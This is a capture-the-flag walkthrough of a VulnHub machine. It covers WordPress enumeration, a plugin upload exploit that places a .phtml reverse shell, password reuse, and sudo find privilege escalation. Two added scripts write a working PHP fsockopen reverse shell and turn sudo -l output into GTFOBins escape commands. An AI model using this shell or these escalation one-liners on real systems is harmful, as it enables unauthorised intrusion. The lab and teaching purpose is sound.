In this article we are going to solve another boot2root challenge. This is an intermediate level machine and requires good enumeration skills. We can download this machine from VulnHub. Please make sure that you download the updated version of the machine from the Google Drive link given here.
As usual our first step is to find the IP address of the machine on the local network using the command: sudo netdiscover -i wlan0
Now that we have the IP address of the target machine, we run the command: sudo nmap -A 192.168.43.97 to check for open ports and service versions.
Only two ports are open, so we decided to browse the HTTP service. One thing is clear from this result: to gain access to this system we must enumerate port 80 very carefully and should focus on each and every result.
When we open the website we get the Apache default home page, which means the web root (DocumentRoot) is /var/www/html/. We then tried a directory brute force but failed to find any useful directory. So we went through the home page source again and found this line.
As said in that line, there is a directory at /var/www/html/g@web, so g@web is a web-accessible directory, and if we open the URL http://192.168.43.97/g@web we find a WordPress website.
Without wasting time we fire up wpscan using the command: sudo wpscan --url http://192.168.43.97/g@web
As we can see we have an outdated plugin, and there is a high chance of exploiting it, so we searched the internet and found an exploit that lets us upload a .phtml file. The point of the .phtml extension is that it is an alternative PHP extension: on a Debian/Ubuntu Apache with mod_php, the PHP handler's FilesMatch rule covers .php, .phar and .phtml, so a .phtml file is executed exactly like .php while an upload filter that only blocks .php lets it through. You can find the link at the end of this article to download the exploit.
Now, using this exploit, we can upload a .phtml file and get a reverse shell.
Here we are using the pentest monkey PHP reverse shell (with our IP and port filled in) and saved it as shell.phtml.
By clicking the submit button we have successfully uploaded the shell, and it can be run from http://192.168.43.97/g@web/wp-content/uploads/wpsp/
Before opening it, start the listener on the port we specified in the .phtml file using the command: nc -nvlp port. In my case it is nc -nvlp 1234
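As an added example (not part of the original walkthrough), the script below shows why the .phtml trick works and wraps the payload step: it checks candidate upload names against the FilesMatch pattern that Debian/Ubuntu ship in their Apache mod_php config, and writes a minimal PHP reverse shell under a name that passes. The reverse shell here is the short fsockopen one-liner rather than the pentest monkey script the walkthrough uploads; the listener address 192.168.43.10 and the file names are assumptions for the demo.

```bash
#!/usr/bin/env bash
# Added example, not code from the walkthrough. Assumes a Debian/Ubuntu-style
# Apache + mod_php host; on other stacks check the handler config yourself.

# Pattern copied from Debian's /etc/apache2/mods-available/php*.conf FilesMatch:
# every file whose name ends in .phar, .php or .phtml goes to the PHP engine.
PHP_FILESMATCH='.+\.ph(ar|p|tml)$'

# php_handled FILENAME -> exit 0 if mod_php would execute FILENAME, 1 otherwise
php_handled() {
    printf '%s\n' "$1" | grep -Eq "$PHP_FILESMATCH"
}

# executable_names NAME... -> prints only the names mod_php would execute,
# one per line; always exits 0 so it can be used in pipelines
executable_names() {
    local n
    for n in "$@"; do
        php_handled "$n" && printf '%s\n' "$n"
    done
    return 0
}

# write_revshell LHOST LPORT OUTFILE -> writes a minimal PHP reverse shell.
# fsockopen() gives the script fd 3, and /bin/sh is attached to it; this is the
# classic one-liner, not the pentest monkey script used in the walkthrough.
write_revshell() {
    local lhost=$1 lport=$2 out=$3
    printf '<?php $s=fsockopen("%s",%d);exec("/bin/sh -i <&3 >&3 2>&3");?>\n' \
        "$lhost" "$lport" > "$out"
}

# Demo on constructed file names: the ones a filter that only blocks ".php"
# would still let through, and the double-extension names that do NOT run.
demo() {
    local dir
    echo "names mod_php would execute:"
    executable_names shell.php shell.phtml shell.phar shell.php.png shell.txt shell.phtml.jpg
    dir=$(mktemp -d)
    write_revshell 192.168.43.10 1234 "$dir/shell.phtml"   # assumed listener address
    echo "payload written to $dir/shell.phtml; start: nc -nvlp 1234"
}

demo
```

Only names ending in .php, .phar or .phtml print; shell.php.png and shell.phtml.jpg do not, because the pattern is anchored at the end of the name. If the target is not a Debian-style Apache, replace PHP_FILESMATCH with the regex from its own handler config before trusting the result.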
Now we have a shell as user www-data. We change directory to /home and there we find 3 users: security, hunter and hackNos-boat.
Now we need a password to log in as any of these users, so we run wpscan again, this time with the user enumeration option. Command used: sudo wpscan --url http://192.168.43.97/g@web --enumerate u
If we open the URL shown in the output we get a hint.
We can use hackNos@9012!! as the password for one of the users.
So now we have these 3 combinations that we can try (with su from the www-data shell) to log in as one of these users:
hunter : hackNos@9012!!
hackNos-boat : hackNos@9012!!
security : hackNos@9012!!
We succeed in logging in as user security.
Now, without wasting time, we use the command sudo -l to check for sudo privileges.
That is what we want: user security can run /usr/bin/find as user hackNos-boat. Using the find trick described on GTFOBins (find's -exec runs an arbitrary command as the user find runs as) we get a shell as hackNos-boat with: sudo -u hackNos-boat /usr/bin/find . -exec /bin/bash \;  Note that -exec runs once per path found, so the first bash you land in is your shell, and exiting it just starts another one for the next entry.
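As an added example (not part of the original walkthrough), the script below turns the last step into a check you can paste into any shell you land in: it parses the text of sudo -l, and for every rule whose binary has a known GTFOBins sudo escape it prints the run-as user and the one-liner. The GTFOBins subset and the sudo -l sample at the bottom are constructed here to mirror the rule the walkthrough abused (security running find as hackNos-boat); they are not the machine's real output.

```bash
#!/usr/bin/env bash
# Added example, not code from the walkthrough. Reads `sudo -l` output on stdin
# and prints an escape for every rule whose binary is in the small table below.

# Constructed subset of GTFOBins sudo entries: basename|command (TARGET = run-as user).
# Extend it with further entries from https://gtfobins.github.io as needed.
GTFO_TABLE='find|sudo -u TARGET find . -exec /bin/bash \;
vim|sudo -u TARGET vim -c ":!/bin/bash"
env|sudo -u TARGET env /bin/bash
less|sudo -u TARGET less /etc/profile   (then type !/bin/bash)'

# trim STRING -> STRING without leading/trailing whitespace
trim() { printf '%s' "$1" | sed -e 's/^[[:space:]]*//' -e 's/[[:space:]]*$//'; }

# gtfo_scan (stdin: sudo -l output)
# prints one line per exploitable rule: "<runas>  <rule command>  =>  <escape>"
gtfo_scan() {
    local line runas cmds cmd base tmpl
    while IFS= read -r line; do
        # rule lines look like "    (user[ : group]) [NOPASSWD:] /path/cmd[, /path/cmd2]";
        # header and Defaults lines do not start with "(" and are skipped
        printf '%s\n' "$line" | grep -q '^[[:space:]]*(' || continue
        runas=${line#*\(}; runas=${runas%%\)*}; runas=$(trim "${runas%%:*}")
        cmds=${line#*\)}; cmds=${cmds#*NOPASSWD:}      # drop the tag if present
        cmds=$(printf '%s\n' "$cmds" | tr ',' '\n')    # one command per line
        while IFS= read -r cmd; do
            cmd=$(trim "$cmd"); [ -n "$cmd" ] || continue
            if [ "$cmd" = ALL ]; then                  # any command: just ask for a shell
                printf '%s  ALL  =>  sudo -u %s /bin/bash\n' "$runas" "$runas"
                continue
            fi
            base=${cmd%% *}; base=${base##*/}          # "/usr/bin/find [args]" -> "find"
            tmpl=$(printf '%s\n' "$GTFO_TABLE" | grep "^$base|") || continue
            printf '%s  %s  =>  %s\n' "$runas" "$cmd" "${tmpl#*|}" | sed "s/TARGET/$runas/g"
        done <<EOF
$cmds
EOF
    done
}

# Demo on constructed sudo -l output shaped like the walkthrough's situation.
demo() {
    gtfo_scan <<'EOF'
Matching Defaults entries for security on hacknos:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User security may run the following commands on hacknos:
    (hackNos-boat) /usr/bin/find
    (root) NOPASSWD: /usr/bin/systemctl restart apache2
EOF
}

demo
```

On the sample above only the find rule is reported, as `hackNos-boat  /usr/bin/find  =>  sudo -u hackNos-boat find . -exec /bin/bash \;`; the systemctl rule is silently skipped because it is not in the table, so an empty result means "nothing in my table matched", not "nothing exploitable". A rule of the form (user) ALL is reported directly as a plain sudo -u shell.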